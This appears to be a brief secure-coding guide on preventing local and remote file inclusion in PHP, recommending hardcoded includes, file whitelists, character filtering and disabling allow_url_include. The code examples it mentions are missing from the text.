A local/remote file inclusion exists when the user input is not validated correctly and is passed to the PHP functions include, include_once, require, require_once, fopen, readfile etc. Therefore never include files directly from variables that can be manipulated by the user. The following code example shows one possibility how to validate users input securely.
The best way to avoid this vulnerability is to hardcode all files which you need to include, as the example above suggests. If you really need the inclusion of dynamic files, you could only allow characters that are needed like
and disallow anything else like
./\. A maybe even better solution is, to maintain a whitelist of files that are allowed to be included. Any other file that is requested by the user can simply be rejected.
Note: If you try to implement your own filters and pass the filtered user input directly to the various include functions, make sure that your filters can not be bypassed by using methods like string encoding.
Avoid Remote File Inclusion
If you do not need the inclusion of remote files you can set
"allow_url_include=off" in your php.ini file to disable inclusion of remote files.
For more information visit https://crashtest-security.com